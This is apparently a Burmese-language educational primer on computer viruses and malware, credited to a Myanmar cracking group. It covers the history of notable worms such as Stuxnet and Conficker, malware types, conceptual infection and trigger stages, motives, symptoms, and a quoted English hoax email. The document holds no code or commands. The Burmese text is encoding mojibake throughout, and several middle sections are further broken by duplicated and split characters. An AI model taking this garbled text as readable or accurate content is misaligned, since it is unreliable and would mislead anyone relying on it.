taMumif;jycsufr&SdyJ uGefysLwmudk jyefzGifhapjcif;wdkY jyKvkyfavonf/ Sasser Worm \ tjcm;aom
Adkif;&yfpfrsm;ESifh uGJjym;rIrSm ul;pufcH&ap&eftwGuf File Attachment udkzGifh&efrvdkjcif;jzpfonf/
¤if;tpm; Worm onf vHkNcHKa&;ydkif;qdkif&m tm;enf;csuf&Sdaom uGefysLwmrsm;udk &SmazGNyD; ¤if;wdkYudk
tzsuftarSmifhvkyfavonf/ 18ESpft½G,f&Sd *smreftxufwef;ausmif;om;wpfa,mufu Worm
udkzefwD;aMumif; 0efcHavonf/ olonf Adkif;&yfpf\ tjcm;aom Version udk a&;om;jzefYa0cJhaMumif;
oHo,jzpfcH&avonf/
13/ 2005? rwfvwGif urÇmYyxrqHk;aom qJvfzkef;Adkif;&yfpf Commwarrior-A udkawGYjrif&yg
onf/ Adkif;&yfpfonf ½k&SwGif pwifay:aygufvmcJhzG,f&SdNyD; Text Message rsm;rSwqifh ysHUcJhjcif;jzpf
onf/ aemufqHk;avhvmqef;ppfrIrsm;t& Commwarrior-A onf qJvfzkef; 60 rQom ul;pufapcJh
onf/ odkYaomf pGrf;oxufpGrf;vmMuaom qJvfzkef;Adkif;&yfpfrsm;udk aMumufvSefYrI jrifhonfxufjrifh
vmcJhavonf/
14/ 2008 ckESpf? Edk0ifbmwGif awGY&Sd&aom Conficker Adkif;&yfpfonf 2003 ckESpfwGifay:cJh
aom Slammer aemufydkif;wGif tBuD;rm;qHk;aom Worm [k ,lq&avonf/ xdk Worm onf
jyifopfa&wyf? t*FvefumuG,fa&;0efBuD;Xme? aemfa0&JwyfzGJYESifh tjcm;aom tpdk;&tzGJYtpnf;rsm;&Sd
Server rsm;tygt0if Server pepfaygif; 9 oef; ESifh 15oef;Mum; ul;pufcHcJh&onf/ ¤if;udk
awGY&Sdonfhtcsdefuwnf;u tenf;qHk; Adkif;&yfpfrsdK;uGJaygif; 5rsdK;cefY xGuf&SdNyD;jzpfavonf/ Conficker

udka&;om;olrsm;onf Adkif;&yfpfudk okwfoif&ef BudK;pm;apvdkjcif;tvdkYiSm xdkrsdK;uGJrsm;udk a&;om;jzefY
jzL;jcif;jzpfEdkifonf[k tmPmydkifrsm;u ,lqavonf/
15/ 2010 ckESpf? ZGefvwGif awGY&Sd&aom Stuxnet onf Microsoft Windows wGiftoHk;jyK
aom Siemens puf½HkoHk;aqmhzf0Jvfrsm;udk ypfrSwfxm;cJhonf/ ¤if;onf puf½HkoHk;ypönf;rsm;udk
zsufqD;apaom yxrqHk;aom Worm jzpfcJhonf/ tvm;wl Stuxnet onf ¤if;wnf&SdaMumif;udk
zHk;uG,f&eftwGuf Programmable Logic Controller (PLC) aqmhzf0Jvfyg0ifaom yxrqHk; Worm
jzpfcJhonf/ Mo*kwfvwGif vHkNcHKa&;qdkif&maqmhzf0Jvfrsm;xkwfvkyfonfh Symantec ukrÜPDu Stuxnet
ul;pufcH&aom uGefysLwm 60%cefYonf tD&efEdkifiHwGifjzpfonf[k azmfjycJhonf/ Edk0ifbmwGif
Siemens u Worm aMumifh oHk;pGJolrsm;\uGefysLwmrsm;udk rnfonfhzsufqD;rIrsdK;rS rjzpfapcJhaMumif;
aMunmavonf/ rnfodkYqdkapumrl Stuxnet aMumifh tD&ef\ e,l;uvD;,m;y½dk*&rf zsufqD;cHcJh&
onf/ tD&efonf ol\e,l;uvD;,m;y½dk*&rftwGuf ydwfyifuefYowfjcif;cHxm;&aom Siemens \
ypönf;ud&d,mrsm;udk toHk;jyKxm;avonf/ ½k&SuGefysLwmukrÜPDjzpfaom Kaspersky Lab u Stuxnet
onf EdkifiHwpfck\ taxmuftyHhtjynfh&SdrSom vkyfaqmifEkdifonfh qef;jym;½IyfaxG;vSonfh wdkufckduf
rItrsdK;tpm;jzpfaMumif; aumufcsufcsavonf/
16/ 2012 ckESpfwGif Microsoft Windows toHk;jyKaom uGefysLwmrsm;udk wdkufcdkufonfh
Malware wpfrsdK;jzpfonfh Flame udkawGY&SdcJhonf/ bl'gyufpfwuúodkvf\ CrySys Lab rS ar 28 wGif
xkwfjyefaom tpD&ifcHpmwGif ]rnfodkYyifjzpfap? ¤if;onf awGYbl;orQwGif t½IyfaxG;qHk;aom
Malware jzpfonf} [kazmfjycJhonf/ Flame onf Skype wGif pum;ajymqdkjcif;rsm;? toH?
uD;bkwfqdkif&mvkyfaqmifcsufrsm;? uGef,ufoHk;pGJrIESifh "gwfyHkrSwfwrf;wifjcif; (Screenshoot) rsm;udk
rSwfwrf;wifxm;Edkifavonf/ ¤if;onf Local Network odkY USB Stick udk ul;pufavonf/ Flame ü
uGefysLwmrS ¤if;tm; ajc&mcHrItm;vHk;udk zsufqD;ypfrnfh kill command wpfckyg&Sdavonf/ ZGefv 1
&ufaeYwGif The New York Time \aqmif;yg;wpfckü Stuxnet onf tar&duefjynfaxmifpkESifh
tpöa&;wdkY\ ]tdkvHypf*drf;ppfqifa&;} [kac:onfh ÓPppfqifa&;\ tpdwftydkif;jzpfonf[k azmfjy
cJhonf/ a*smhbk&Sf\or®woufwrf;twGif; pwifcJhNyD; ppfqifa&;onf or®wtdkbm;rm;vufxuf
wdkifatmif &SnfMumcJhonf/

tcef;(2)
Adkif;&yffpftrsdK;tpm;rsm;ESifh vu©Pmrsm;
1/ Adkif;&yfpftrsdK;tpm;rsm;taMumif; raqG;aEG;cif Adkif;&yfpfrsm;tm; tjcm;aom Worm?
Adware? Trojan? Spyware ponfwdkYESifh a&maxG;rIr&Sdapa&;twGuf Malware taMumif;udk OD;pGm
rdwfqufvdkygonf/ Malware qdkonfrSm aqmhzf0Jvfwpfck\ tydkif;tpwpfckjzpfNyD; tzsuftarSmifh
(odkY) rvdkvm;tyfaom tjyKtrlrsm;udk jyKvkyf&ef &nf½G,fa&;om;xm;onf/ Malware qdkonfhtoHk;
tEIef;onf Botnet? Adkif;&yfpf? Worm? Trojan ponfh rvdkvm;tyfaom aqmhzf0Jvfrsm;udk azmfjy&ef
oHk;EIef;aom toHk;tEIef;wpfckjzpfygonf/
Malware trsdK;tpm;rsm;
2/ Malware trsdK;tpm;rsm;rSm atmufygtwkdif;jzpfygonf-
(u) Worm/ Worm onf udk,fwdkifyGm;apaomy½dk*&rfjzpfNyD; tjcm;aomuGefysLwm
pepfrsm;udk ul;pufapEkdif&eftwGuf pepf\tm;enf;csufESifh [muGufrsm;udk t
jynfht0toHk;csavonf/
( c) Adkif;&yfpf/ þ Malware trsdK;tpm;onf Executable zdkif (rsm;aomtm;jzifh .exe
zdkif)wpfckudk tvkyfvkyfapaomtcg? pwifaomtcg ysHUESHYonf/ xdkYaMumifh Adkif;
&yfpfrsm;ysHUESHYjcif;onf oHk;pGJoltay:wGif rSDcdkayonf/
( *) Trojan/ Trojan onf w&m;0ify½dk*&rftjzpf [efaqmifonfh y½dk*&rfwpfckjzpf
onf/ uGefysLwmpepftm; aemufuG,frSaeí ul;pufapNyD; uGefysLwmpepfxdk;
azmufoltm; pepfudk toHk;cscGifh&&Sdatmif jznfhpGrf;ay;avonf/
(C) Botnet/ ydkif&Sifrsm;\rodrIaMumifh tkyfpkwpfck\ xdef;csKyfrIESifh Malware rsm;\
ul;pufjcif;udkcH&aom oD;oefYuGefysLwmuGef,ufwpfck jzpfonf/
( i) Spyware/ Spyware [laomtoHk;tEIef;onf Trojan? Keylogger ESifh Backdoor
wdkYudk &nfñTef;Edkifonf/ tajccHtm;jzifh yk*¾vduudk,fa&;tcsuftvufrsm;udk
cdk;,l&ef&nf½G,fí a&;om;xm;aom y½dk*&rfjzpfonf/ tcsuftvufrsm;onf
zdkiftoGifjzifh? Keystroke rSwfwrf;rsm;toGifjzifh? Screenshoot rsm;rSwqifh ayguf
Mum;Ekdifonf/
( p) Keylogger/ uGefysLwmoHk;pGJolrS jyKvkyfaom Keystroke wdkif;udk rSwfwrf;wif
xm;onfh uGefysLwmy½dk*&rfjzpfonf/ txl;ojzifh pum;0Sufrsm;ESifh tjcm;aom
twGif;a&;tcsuftvufrsm;udk vdrfvnf&&Sd&ef &,f½G,fonf/
(q) Dialer/ tifwmeufqufoG,frIrsm;tm; vrf;vTJ&ef rMumcPtoHk;jyKavh&Sdonfh
y½dk*&rfwpfckjzpfonf/ tzsuftarSmifhenf;rsm; toHk;jyKcsdefwGif tifwmeufcsdwf
quf&ef toHk;jyKaom w&m;0ifw,fvDzkef;qufoG,frIrsm;tm; jzwfawmufNyD;
y&DrD,HEIef;eHygwf (1-900 eHygwfrsm;) rSwqifh jyefvnfcsdwfqufavonf/
Dialer onf Spyware wpfrsdK;jzpfNyD; oif\ Dial-up Setting rsm;udktoHk;jyKEkdif
onf/

3/ ta&;BuD;aomtcsufrSm Malware wpfckwGif Spyware? Worm rsm; (odkYr[kwf) tjcm;
aom Keylogger? Trojan ponfwkdYaygif;pyfyg0ifEdkifygonf/ xdkYaMumifh Malware rsm;udk aemufxyf
trsdK;tpm;rsm; xyfwdk;csifvQif xyfwdk;aumif;xyfwkd;Ekdifygonf/ Oyrmtaejzifh Zeus/Zbot Malware
jzifh erlemjyoEdkifygonf/ Zeus Malware tm; atmufygtkyfpkwpfckcktjzpf owfrSwfEkdifygonf-
(u) Trojan/ ¤if;onf wdkufcdkufcH&ol\ uGefysLwmwGif wdwfwdwfykef;aexdkifNyD; uGef
ysLwmpepfESifhtwl tvdktavsmufpwif&ef BudK;yrf;vkyfaqmifvsuf&Sdygonf/
( c) Botnet/ ¤if;udk ypfrSwfom;aumifrsm; axmifESifhcsDí udkifwG,fEdkifaom Server
wpfckwnf;jzifh A[dkusus pDrHEdkifygonf/ xdkYjyif Zeus wGif DDOS rsm;jzifhwdkuf
cdkufEdkifaom Plugin rsm;yg&Sdygonf/
( *) Spyware/ Zeus onf tajccHtm;jzifh Spyware wpfckjzpfNyD; ¤if;\ypfrSwfom;
aumifrsm;\ vkyfaqmifrIrsm;udk ajc&mcHonf/
(C) Keylogger/ Zeus onf Keyboard rS½dkufESdyfvdkufaom Key rsm;udk rSwfwrf;wif
xm;onf/ odkYaomf toHk;jyKcJavonf/ ¤if;tpm; tcsuftvufrsm;udk rSwfwrf;
wif&ef xdkxufydkí pdwf0ifpm;zG,faumif;aomenf;vrf;rsm;udk toHk;jyKonf/
Adkif;&yfpfqdkonfrSm
4/ uGefysLwmAdkif;&yfpfqdkonfrSm udk,fwdkifyGm;Edik faomy½dk*&rfjzpfNyD; ¤if;rSudk,fydkifuk'fxkwf
ay;um tjcm; .exe zdkifwpfck\uk'frsm;udk rdrdukd,fydkifuk'frsm; aygif;xnfhjcif;jzpfonf/ uGefysLwm
Adkif;&yfpfrsm;tm; yk*¾vduvkyfief;ESifh pD;yGm;a&;vkyfief;rsm;twGufyg Ncdrf;ajcmufrItjzpf rSwf,lEkdif
onf/ ¤if;wdkYonf uGefysLwmoHk;pGJolrsm;\ tvdkqE´rygbJ tvkyfvkyfMuavonf/ Adkif;&yfpfrsm;
onf ¤if;ul;pufcHxm;&aom y½dk*&rftvkyfvkyfonfhtcg rSwfOmPfrsm;xJwGif wnf&SdMuNyD;
yGm;rsm;jcif; tvkyfudk vkyfaqmifMuavonf/ y½dk*&rf tvkyfvkyfjcif; NyD;qHk;aomtcg rSwfOmPf
xJwGif rwnf&SdEdkifawmhay/ pepfxw J Gif&Sdaom tjcm;zdkifrsm;udk &SmazGNyD; ul;puf&ef BudK;pm;Muonf/
zsufqD;&ef&nf½G,frIay:rlwnfNyD; Adkif;&yfpfrsm;tm; p½dkufvu©PmcGJjcm;Muonf/ tcsdKUaomAdkif;&yfpf
rsm;udk axGaxGxl;xl; &nf½G,fcsufr&SdbJ yGm;½Hkoufoufom &nf½G,fNyD; a&;om;Muonf/ uGefysLwm
Adkif;&yfpfrsm;onf ZD0aA'qdkif&mAdkif;&yfpfrsm;ESifh tvGefqifwlonf/ Adkif;&yfpfESpfrsdK;vHk;onf &Sifoef
&efESifh ysHUyGm;&eftwGuf vufcHaumifrsm; vdktyfavonf/ uGefysLwmAdkif;&yfpfrsm;onf ysHUyGm;&ef
twGuf .exe zdkifrsm;udk ul;puf&NyD; ZD0aA'qdkif&mAdkif;&yfpfrsm;onf vufcHaumif\ qJvfrsm;udk
ul;puf&onf/
5/ Worm rsm;onf udk,fwkdifyGm;Ekdifaom Malware wpfrsdK;jzpfonf/ Adkif;&yfpfrsm;uJhodkYyif
ysHUESHYjcif; 0daoooabm&Sdonf/ wpfcgw&HwGif Worm rsm;tm; Adkif;&yfpf[k owfrSwfMuonf/
Adkif;&yfpfESifh Worm wdkY\ t"du uGJjym;jcm;em;csufrSm atmufygtwkdif;jzpfonf-
(u) Adkif;&yfpfrsm; ysHUyGm;&eftwGuf vufcHzdkifrsm;vdktyfaomfvnf; Worm rsm;onf
oD;oefY &yfwnfaom y½dk*&rfrsm;jzpfí ¤if;ysHUyGm;&eftwGuf vufcHzdkifrsm; rvdk
tyfyg/
( c) Worm rsm;onf uGefysLwmoHk;pGJol\ vkyfaqmifcsufya,m*rygbJ ysHUESHYEkdifonf/

6/ Adkif;&yfpfrsm;onf uk'frsm;udkajymif;vJypfjcif;jzifh rdrdukd,fudkrdrd toGifajymif;vJEdkifMu
avonf/ xdkYjyif Adkif;&yfpfrsm;onf atmufygenf; (3)enf;jzifh ¤if;wdkYtm; pHkprf;jcif;rS ykef;atmif;Edkif
avonf-
(u) rdrdukd,frdrd oauFw0Sufrsm;jzifh 0Sufavonf/
( c) aemufxyfAdkif;&yfpf Byte rsm; tpm;xdk;&eftwGuf Disk Directory a'wmrsm;
tm; ajymif;vJypfonf/
( *) ¤if;onf Disk a'wmrsm;udk OD;wnf&majymif;&eftwGuf Stealth Algorithm rsm;
udktoHk;jyKonf/
7/ Adkif;&yfpfrsm;onf ypfrSwf\ uGefysLwmpepftm; enf;rsdK;pHkjzifh wdkufcdkufEkdifygonf/ ¤if;
wdkYonf olwdkYudk,folwdkY y½dk*&rfrsm;qD wGJzufEkdifNyD; wdusaomjzpf&yfrsm;udk jyKvkyfzefwD;um tjcm;
y½dk*&rfrsm;qD ay;ydkYul;pufapygonf/ Adkif;&yfpfrsm;onf udk,fwdkifpwifEdkifjcif;? Hardware rsm;udk
ul;pufEkdifjcif;? Execute rvkyfEdkifaom zdkifrsm;udktoHk;jyKí ay;ydkYul;pufEdkifjcif; r&SdaomaMumifh
xdktjzpftysufrsm;udk jzpfysuf&efvdktyfayonf/ uGefysLwmoHk;pGJolrS tD;ar;vf? Website ESihf Flash
Card ponfwdkYrS Attachment rsm;udk zGifhvdkufcsdefwGif ]tpysdK;jcif;}? ]wdkuf½dkufwdkufckdufjcif;}
jzpfpOfrsm;onf Akdif;&yfpfudk touf0ifapjcif;? ypfrSwf\uGefysLwmudk ul;pufapjcif;wdkYudk jzpfapyg
onf/ xdkYaemuf Adkif;&yfpfonf uGefysLwmpepfwGif wpfcgwnf;yg&Sdvmaom y½dk*&rfrsm;? Anti-virus
aqmhzf0Jvfrsm;ESifh tcsuftvufzdkifrsm;? uGefysLwmpwifrIpepfrsm;udk wdkufcdkufEkdifygonf/ a,bl,s
tm;jzifh Adkif;&yfpfrsm;wGif toGifESpfrsdK;&SdEkdifNyD; ¤if;wdkYrSm atmufygtwdkif;jzpfygonf-
(u) ul;pufjcif;toGif
(1) Adkif;&yfpfzefwD;olrsm;onf wdkufcdkufcH&rnfhuGefysLwmpepf\y½dk*&rfrsm;tm;
rnfonfhtcsdefwGif ul;pufrnfudk qHk;jzwfMuonf/
(2) tcsdKUaomAdkif;&yfpfrsm;onf ¤if;wdkYtvkyfvkyfonfh tcsdefwkdif;wGif ul;puf
Muavonf/ (Oyrm – wdkuf½dkufAdkif;&yfpfrsm;)
(3) tcsdKUaomAdkif;&yfpfuk'frsm;onf rdrdul;pufvdkonfh tcsdef? aeY? txl;jzpf&yf
rsm;wGif tvkyfvkyfonf/ (Oyrm – TSR Adkif;&yfpfrsm;onf rSwfOmPfay:odkY
t&iful;wifNyD; aemufydkif;tqifhrsm;wGifrS ul;pufonf/)
( c) wdkufcdkufjcif;toGif
(1) tcsdKUaomAdkif;&yfpfrsm;wGif pepftm; ysufpD;ap&ef? touf0ifap&ef tpysdK;
jzpf&yfrsm;&Sdonf/
(2) tcsdKUaomAdkif;&yfpfrsm;onf zdkifrsm;udk yHkwlyGm;NyD; zdkifrsm;udk zsufjcif;?
Session Time udkwdk;apjcif;rsm;jyKvkyfonf/
Adkif;&yfpfuk'f ul;pufjcif;toGifjzifh tvkyfvkyfyHk
8/ Adkif;&yfpfonf atmufygtpDtpOfrsm;toHk;jyKí uGefysLwmpepftm; ul;pufEkdifonf-
(u) Adkif;&yfpfonf rdrdukd,frdrd rSwfOmPfxJodkY ul;wifvdkufNyD; Disk ay:&Sd Executable
zdkifrsm;udk ppfaq;ygonf/
The Virruses : Intern
nals V 1.0 - rhythm
r (Myaanmar Crackking Team) 14

( c) Adkif;&yfpfonf uGefysLwmmoHk;pGJol rodbJ (odkY) cGifhjyKcsufr&S r dbJ tzsu ufftarSmifh
uk'frsm;udk w&m;0if
w y½dk*&rf
* rsm;qDo oddkY aygif;xnfnonf
h /
( *) uGefysLwmoH oH;k olonf zdifk rsm;tpm;x xdk;jcif;? ul;pufp cHxm;&aaom y½kd*&&rfrsm; t
vkyfvkyfaeo onfudk owd wdrjyKrdbJ jzpfaeonf/
(C) tjcm;aom y½dk*&rfrsm;;onfvnf; ul;pufcHxm;&aomy½d m *&rf
*k rsm; tv vkyfvkyfrI
tusdK;qufaMumif
a h xyfrHrHul;pufcH&avonf
a /
( i) txufazmfjyygpuf0ef;onf o uGefysLwmtoH
L k;jyKo
olrS pepfBuD
Bu;D onf rlrrSrefawmh[k
xifjrif,lqjcif
q ; r&Sdao;oí o vnfywf
y aeygon nf/
9/ Adkif;&yfpfpfrsm;onf tpysd
t K;jcif;ESififh vkyfaqmifjcif;wdkYudk jyKvkyf&on nf/ uGefysLw wmwpfvHk;
tvkyfv vyfk aecdsefwGif y½dk*&rfrsmm;udk tvkyfyfvkyfap&ef enf;vrf;rsm;pGm&Sdavo onf/ Oyrmmtaejzifh
rnfonf nh Setup y½dk*&rf * rqdk peppfxJwGif wpfpfcgwnf;ygv vmaom y½dk*&rfawmfawmf w rsm;rsm;ud udk ac:oHk;
&avon nf/ xdktxJrSr tcsdKUonf nf jzefYjzL;a&&;twGuf Mum;cHy½dk*&rfrrsm;jzpfavo onf/ tu, ,fí Adkif;
&yfpfy½dk**&rfwpfck &SdaecJ a haomf ¤if ¤ ;onf xdkvk vyfaqmifrIrsm;twGif; touf0ifoG om;EkdifNyD; aaemufxyf
Setup y½d ½dk*&rfrsm;udk aumif;pGm ul;pufaprrnfjzpfonf/ owfowf wrSwfrSwfAdkif;&yfpfrsm;on nf rwlnD
aom en nf;vrf;rsm;jjzifz h ul;pufMuavonf/ zdkifAdkif;&yfpfpfonf rdrdud uk,fwdkif y½d½dk*&rfwpfckq
qDD wGJzuf
jcif;jzifh ul;pufavo onf/ rl&if;y½dk*&rfuk'f'frsm;? Batchh zkdifrsm;? SScript zdkifrsmm;uJhodkYaomm pmom;
oufou ufzdkifrsm;udkvnf
v ; Adkif;&yfyfpful;puf&ef tvm;t tvm&Sdaom ypfrSwfrsm;t tjzpf ,lqqEkdifonf/
Boot Secctor Adkif;&yfpfonf ypfrS rSwfuGefysLwm
w tvkyfrvk vyfrD Disk \ yxraee&mwGif&Sdaom o ol\
uk'fudk t tvkyfvkyfapygonf
p /
yHk(1) .exe zdkifwpfckudk Adkif;&yfpful;pufjcif; rjy

jyKrDESifh ul;pu
ufxm;NyD;aemmuf jrif&yHk
nals V 1.0 - rhythm

10/ Adkif;&yfpfpfrsm;onf eenf;aygif;pHkjzifh ysHUESHYMuo onf/ ¤if;wdkYtvkyfvkyfwd wkif; ul;pufufysHUyGm;Mu
aom Adkif;&yfpfrsm;v vnf; &Sdavonf v / tcsd t KUaomy½dk*&rf * rsm;onf nf ¤if;wdkYpwif w tvkyfvk vkyfcsdefwGif
ul;pufjccif; r&SdMuayy/ ¤if;wdkYonf uGefysLw wm\ rSwfOmmPftwGif;wG wif cdkatmifif;aeMuNyD; aemuf a ydkif;
wGifrS y½dk*&rfrsm;ud uk ul;pufavonf v / xkdAdAdkif;&yfpfrsm;o onf aemuf ufydkif;tqifwG hwif ysHUyGm;&&eftwGuf
owfrSw wxm;aom
f tpysdK;jzpf&yf
& rsm;udk apmif
a hqdkif;Muavonf/ xdkYaMumifh rnfonfhjzppf&yfonf
ikyfaeao omAdkif;&yfpf\ ul;pufjcif jc ;udk tpyysdK;vkyfaqmifrnfenf;[k owfrSwf w&f ef cufcJavonf
a /
Adkif;&yfpfu
uk'f ul;pufjcif;toGifjzif jz h tvkyfvyfvk yHkudk yHk(1)wwGif awGYjrifEdkifygonf/ yHk(1-c)udk Munf M hvQif
Adkif;&yfpfo
onf ¤if;\u uk'frul;puf ufcif .exe zdkiif\ File Heeader wGif IInstruction Pointer P (IP) wefzdk;udk
oGm;a&mu ufjyifqifonfudk awGYjrifEkdifygonf/ xdk Instruuction Pointeer u Adkif;&yfpfuk'frsm; &Sd&mqDodkY
ñTef;um Adkif;&yfpu'f fuk rsm;udk vkyfaqmifNyD;rS rlvy½dk*½dkuk'frsm;udk tvkyfvkyfaponf a udk awGY&Sd&yg
onf/
11/ atmufazmfjyygenf n;vrf;rsm;on nf Adkif;&yfppfysHUESHY&eftwG
wuf tjzpfpfEdkifqHk;aomenf;vrf;
rsm;jzpfMuonf
Mu -
(u) ul;pufcHxm;&aomzd m kifrs trsdK;rsdK;udk ul;pufEkdifonf/
rsm;/ Adkif;&yfpfpfonf zdkift
( c) zdkifjzefYa0jcifif;vkyfief;rsmm;/ Adkif;&yfpfrrsm;onf zdkifif Server rssm;rSwqifh zdkifrsm;udk
ul;pufapEkifid fygonf/ uG uefysLwmt toHk;jyKolrS oHo,uif;pG ; m zkdifudkzzGGifhcsdefwGif
olwdkY\pufrsm;od
r kY ul;pu ufaprnfjzpfpygonf/
( *) Floppy F ESifh tjcm;odrf;qnf;Edkifaomypö
o nf;rsm;/ ul;pufcHxm;&aom x Disk rsm;
D
udk Adkif;&yfpfpfr&SdaomuGefefysLwmrsm;ododkY wyfqifcsdcsdefwGif uGefysLwmpepfo onfvnf;
ul;pufjcif;cH&ygonf/
Adkif;&yfpfu
uk'f wdkufcdufkujcif;toGijzif if h tvkyfvk v yfyHk
12/ Adkif;&yfpfpfrsm;onf ¤if ¤ ;wdkYtm;zefefwD;ol\ tvd t ktwdkif; yGm;rsm;½Hwif kw r[kwfbJ ¤if;wdkY\
ypfrSwfrsmm;udkvnf; ysufpD;apav vonf/ tcsd t KUaomAdkif;&yfpfrsm;on nf zdkifrsm;ud udkzsufjcif;? tcsuft
vufzdkifrrsm;xJ&Sd tccsuftvufrs r m;udk ajymif
m ;vJypfjcif;? pufvnfyywfrIpepfud udk aES;auG;atmifvkyf
aqmifjcifif;? Application rsm;ESifhroufqdkifaom o vkyfaqmmifcsufrsm;ud udk vkyfaqmififaponf/ yHk(2)/
yHk(2) AdAkif;&yfpfwkduf
ucdkufrIaMummifh Disk (od
oYkY) rSwfOmPf&&Sd Page tu
uefYrsm;
wpfqufwnf;rwn nf&SdawmhbJ wpf
w ae&mpDu uGGJaeMuyHk

uGefysLwmAdkif;&yfpfrsm; zefwD;Mujcif; taMumif;&if;
13/ vlrsm; uGefysLwmAdkif;&yfpfrsm;udk a&;om;jzefYjzL;&jcif; taMumif;&if;udk qef;ppfMunfh
aomf atmufygtcsufrsm;aMumifhjzpfaMumif; awGY&Sd&ygonf-
(u) okawoeya&m*sufrsm; jyKpk&ef/
( c) aemufajymifusDp,f&ef/
( *) vufo&rf;zsufqD;&ef/
(C) &nf½G,fxm;aom ukrÜPDrsm;\ xkwfukefrsm;udk wdkufcdkuf&ef/
( i) EdkifiHa&; owif;rsm; jzefYjzL;&ef/
( p) aiGaMu; tusdK;tjrwf&&ef/
(q) Identity u'frsm;udk cdk;,l&ef/
( Z) axmufvSrf;pHkprf;&ef/
(ps ) vQdKU0Suf aiGn§pf&ef/
Adkif;&yfpfuJhodkY wdkufcdkufyHkjcif;&m wlnDrIrsm;
14/ wpfcgwpf&HwGif uGefysLwmoHk;pGJolrsm;\ A[kokwenf;yg;rIaMumifhaomfvnf;aumif;?
pdk;&drfpdwfrsm;aMumifhaomfvnf;aumif; trSefpifppf Adkif;&yfpfrsm; wdkufcdkufrIaMumifh r[kwfbJ Adkif;&yfpf
wkdufcdkufrIaMumifh jzpfyGm;&onf[k vltrsm;xifjrifMuaomtcsufrsm;rSm atmufygtcsufrsm;
jzpfavonf-
(u) Hardware ESifhywfoufaom jyóemrsm;/
( c) uGefysLwmzefom;jyifwGif rnfonfrQrjybJ toHjrnfaejcif;rsm;/
( *) Anti-virus y½dk*&rfESpfckteufrS wpfcku uGefysLwmpepfwGif Adkif;&yfpf&Sdonf[k
tpD&ifcHjcif;rsm;/
(C) Hard Drive \trnf ajymif;vJoGm;jcif;rsm;/
( i) uGefysLwmonf Error rsm; rMumcPBuHKawGY&NyD; &yfaejcif;rsm;/
( p) y½dk*&rfrsm; pwiftvkyfvkyfcsed fwGif uGefysLwmaES;usoGm;jcif;/
(q) uGefysLwmpufvnfywfrIpepf toHk;jyKír&awmhjcif;/
( Z) zdkifrsm;ESifh Folder rsm;onf ½kwfw&uf aysmufaeMujcif; (odkY) ¤if;wdkYESifhywfouf
aomtcsufrsm; ajymif;vJukefMujcif;/
(ps ) Hard Drive udk rMumcPtoHk;jyKaejcif;/ (uGefysLwm&Sd rD;oD; vsifjrefpGmvif;ae
jcif;)
(n) Internet Explorer &yfaejcif;/
( #) oifwpfcgrS rydkYbl;aom Message rsm;udk oif\oli,fcsif;rsm; &aeonf[k
ajymqdkMujcif;/

Adkif;&yfpf Hoax rsm;
15/ Hoax rsm;onf r&SdaomAdkif;&yfpfrsm;ESifhywfoufí rSm;,Gif;ajymqdkMuaom tpD&ifcHrI
rsm;jzpfonf/ xdktD;ar;vfudkzGifhvQif uGefysLwmpepfwpfckvHk; ysufpD;apvdrfhrnf[k ysHUESHYvsuf&Sdaom
owday; Message rsm;onfvnf; Hoax rsm;jzpfonf/ tcsdKUaomudpörsm;wGif ¤if;wdkYudk,fwdkifwGifyif
Adkif;&yfpfrsm;wGJygvmMuonf/ Hoax rsm;onf ¤if;wdkYypfrSwfxm;aom pepfrsm;ay:wGif tBuD;tus,f
zsufqD;EkdifpGrf;&Sdavonf/ t"dutm;jzifh em;vnfrIvGJMujcif;aMumifh Adkif;&yfpfrsm;onf '@m&Drsm;udk
tvG,fwulyif jzpfay:apavonf/ tcsdKUaom Hoax rsm;onf &nf½G,fcsuf&Sd&Sd wifapumrl
¤if;wdkY\ ,kwådrwef&maom taMumif;t&mrsm;aMumifh tvsiftjref tqHk;owffcJh&ygonf/ yHk(3)wGif
erlem Hoax wpfckudk wifjytyfygonf/
Subject: [Fwd: Beware of the Budweiser virus--really!]
This information came from Microsoft yesterday morning. Please pass it on to anyone you know
who has access to the Internet. You may receive an apparently harmless Budweiser Screensaver, If
you do, DO NOT OPEN IT UNDER ANY CIRCUMSTANCES, but delete it immediately. Once
opened, you will lose EVERYTHING on your PC. Your hard disk will be completely destroyed and
the person who sent you the message will have access to your name and password via the Internet.
As far as we know, the virus was circulated yesterday morning. It’s a new virus, and extremely
dangerous. Please copy this information and e-mail it to everyone in your address book. We need to
do all we can to block his virus. AOL has confirmed how dangerous it is, and there is no Antivirus
program as yet which is capable of destroying it.
Please take all the necessary precautions, and pass this information on to your friends,
acquaintances and work colleagues.
End of message.
EMAILCHIEF
yHk(3) Budweiser Adkif;&yfpf Hoax
16/ Budweiser (ac:) Buddylst.zip onf trSefwu,fwrf;tm;jzifh Adkif;&yfpfr[kwfbJ Hoax
rQomjzpfygonf/ tu,fí Adkif;&yfpf[k ,HkMunfrdol tD;ar;vfvufcHolonf pdk;&drfBuD;pGmjzifh ¤if;\
oli,fcsif; ta,mufwpf&mcefYqD tD;ar;vftm; jyefñTef;ydkYcJhrdvQif ¤if;wdkYrSvnf; olwdkY\rdwfaqGrsm;
qDjyefjzefYcJhvQif em&Dydkif;twGif; tD;ar;vfonf axmifaomif;csD ysHUoGm;rnfjzpfygonf/ xdktcg ae&m
vGwf,ljcif;? uGef,ufoHk;pGJrI ydkrdkapjcif;? rdwfaqGrsm;\ tcsdefudk ukefapjcif;? tvkyf½Iyfapjcif; ponf
wdkYaMumifh a':vmaxmifESifhcsDNyD; epfem&ygonf/ yHk(3)wGifazmfjyxm;aom tD;ar;vfonf aumvm
[vwpfckomjzpfNyD; zwfMunfhvQif ,kwådrwefrIrsm;pGmudk awGYjrifEdkifygonf/
Adkif;&yfpfwdkufcdkufrI vu©Pmrsm;
17/ atmufygtcsufrsm;onf uGefysLwmwpfvHk;tm; Akdif;&yfpful;pufcH&NyDjzpfaMumif; ajym
Edkifonfhvu©Pm&yfrsm;yifjzpfayonf-
(u) y½dk*&rfrsm;yGifhvm&ef tcsdefMumjrifhjcif;/
( c) uGefysLwmoHk;olrS rnfonfhy½dk*&rfrS Install rvkyfonfhwdkifatmif Hard Drive
onf tNrJwrf;jynfhaejcif;/
( *) toHk;rjyKbJESifh Floppy Disk ESifh Hard Disk Drive rsm; tvkyfvkyfaeMujcif;/

(C) trnfrodzdkifrsm; uGefysLwmwGif ay:aygufaejcif;/
( i) uD;bkwf (odkY) uGefysLwmrS xl;qef;aomtoHrsm; xGufaejcif;/
( p) uGefysLwmzefom;jyifwGif xl;qef;aomt&mrsm; jyaejcif;/
(q) zdkiftrnfrsm;xl;qef;aejcif;? rSwfom;EdkifpGrf;r&Sdaom zdkiftrnfrsm;jzpfjcif;/
